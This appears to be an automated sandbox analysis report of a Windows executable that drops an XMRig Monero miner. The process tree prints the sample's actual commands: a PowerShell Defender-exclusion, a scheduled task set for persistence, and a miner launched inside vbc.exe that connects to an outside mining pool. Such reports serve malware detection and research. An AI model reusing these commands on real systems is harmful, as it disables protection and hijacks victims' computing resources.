Analysis
-
max time kernel
83s -
max time network
121s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
10-11-2022 19:31
Static task
static1
General
-
Target
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
-
Size
1.1MB
-
MD5
19a474356662325b2059630216338194
-
SHA1
5537672751a37401bccf455f651d564bb314a924
-
SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
-
SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
SSDEEP
24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/904-235-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/904-236-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/904-237-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/904-238-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/904-240-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/904-242-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
AVPTQBAEW.exepid process 4128 AVPTQBAEW.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
AVPTQBAEW.exedescription pid process target process PID 4128 set thread context of 904 4128 AVPTQBAEW.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3688 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeAVPTQBAEW.exepid process 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 4128 AVPTQBAEW.exe 4128 AVPTQBAEW.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 620 -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 520 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1816 powershell.exe Token: SeSecurityPrivilege 1816 powershell.exe Token: SeTakeOwnershipPrivilege 1816 powershell.exe Token: SeLoadDriverPrivilege 1816 powershell.exe Token: SeSystemProfilePrivilege 1816 powershell.exe Token: SeSystemtimePrivilege 1816 powershell.exe Token: SeProfSingleProcessPrivilege 1816 powershell.exe Token: SeIncBasePriorityPrivilege 1816 powershell.exe Token: SeCreatePagefilePrivilege 1816 powershell.exe Token: SeBackupPrivilege 1816 powershell.exe Token: SeRestorePrivilege 1816 powershell.exe Token: SeShutdownPrivilege 1816 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeSystemEnvironmentPrivilege 1816 powershell.exe Token: SeRemoteShutdownPrivilege 1816 powershell.exe Token: SeUndockPrivilege 1816 powershell.exe Token: SeManageVolumePrivilege 1816 powershell.exe Token: 33 1816 powershell.exe Token: 34 1816 powershell.exe Token: 35 1816 powershell.exe Token: 36 1816 powershell.exe Token: SeDebugPrivilege 4128 AVPTQBAEW.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeIncreaseQuotaPrivilege 3356 powershell.exe Token: SeSecurityPrivilege 3356 powershell.exe Token: SeTakeOwnershipPrivilege 3356 powershell.exe Token: SeLoadDriverPrivilege 3356 powershell.exe Token: SeSystemProfilePrivilege 3356 powershell.exe Token: SeSystemtimePrivilege 3356 powershell.exe Token: SeProfSingleProcessPrivilege 3356 powershell.exe Token: SeIncBasePriorityPrivilege 3356 powershell.exe Token: SeCreatePagefilePrivilege 3356 powershell.exe Token: SeBackupPrivilege 3356 powershell.exe Token: SeRestorePrivilege 3356 powershell.exe Token: SeShutdownPrivilege 3356 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeSystemEnvironmentPrivilege 3356 powershell.exe Token: SeRemoteShutdownPrivilege 3356 powershell.exe Token: SeUndockPrivilege 3356 powershell.exe Token: SeManageVolumePrivilege 3356 powershell.exe Token: 33 3356 powershell.exe Token: 34 3356 powershell.exe Token: 35 3356 powershell.exe Token: 36 3356 powershell.exe Token: SeLockMemoryPrivilege 904 vbc.exe Token: SeLockMemoryPrivilege 904 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 904 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.execmd.exeAVPTQBAEW.execmd.exedescription pid process target process PID 520 wrote to memory of 1816 520 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe powershell.exe PID 520 wrote to memory of 1816 520 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe powershell.exe PID 520 wrote to memory of 4828 520 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe cmd.exe PID 520 wrote to memory of 4828 520 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe cmd.exe PID 4828 wrote to memory of 3688 4828 cmd.exe timeout.exe PID 4828 wrote to memory of 3688 4828 cmd.exe timeout.exe PID 4828 wrote to memory of 4128 4828 cmd.exe AVPTQBAEW.exe PID 4828 wrote to memory of 4128 4828 cmd.exe AVPTQBAEW.exe PID 4128 wrote to memory of 3356 4128 AVPTQBAEW.exe powershell.exe PID 4128 wrote to memory of 3356 4128 AVPTQBAEW.exe powershell.exe PID 4128 wrote to memory of 2732 4128 AVPTQBAEW.exe cmd.exe PID 4128 wrote to memory of 2732 4128 AVPTQBAEW.exe cmd.exe PID 2732 wrote to memory of 4268 2732 cmd.exe schtasks.exe PID 2732 wrote to memory of 4268 2732 cmd.exe schtasks.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe PID 4128 wrote to memory of 904 4128 AVPTQBAEW.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9CB2.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:3688 -
C:\ProgramData\WindowsMail\AVPTQBAEW.exe"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"5⤵
- Creates scheduled task(s)
PID:4268 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:904
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD528c9fcd4f5595c2fcee67e3ca23d7586
SHA113cc462d741fca4a431c6e1e9aa24d91ce272e41
SHA2568892662ba2f7e160cb68c7c8b71528052e9a641530ebdd609341dc27fbc3c831
SHA512da0f15d05ebe59214d1b1c98fb88a13755393fe37b82b2e459e97d8856901119c0f7827def4da4d3efcb42f77084c5936dc1ac726f778df694b2e3fb01a5b066
-
Filesize
149B
MD5307d91e061f4b3fe0f1dde9aa70b7bb9
SHA1a30822b2e5459759425d2608131013ce24bb305f
SHA256edfc5b0662b4447a59ed2d8d3acd76a61ae2fa6cea05e61d949a4ae1daadc95b
SHA5128c4818fb2afb50a702f391c0ea3f7457020840c096d18052214490d3a99f60bb0ee5439b66c8f09aad3304ca6267b7fb05a3f48ef67e1855f384fb1e0a770823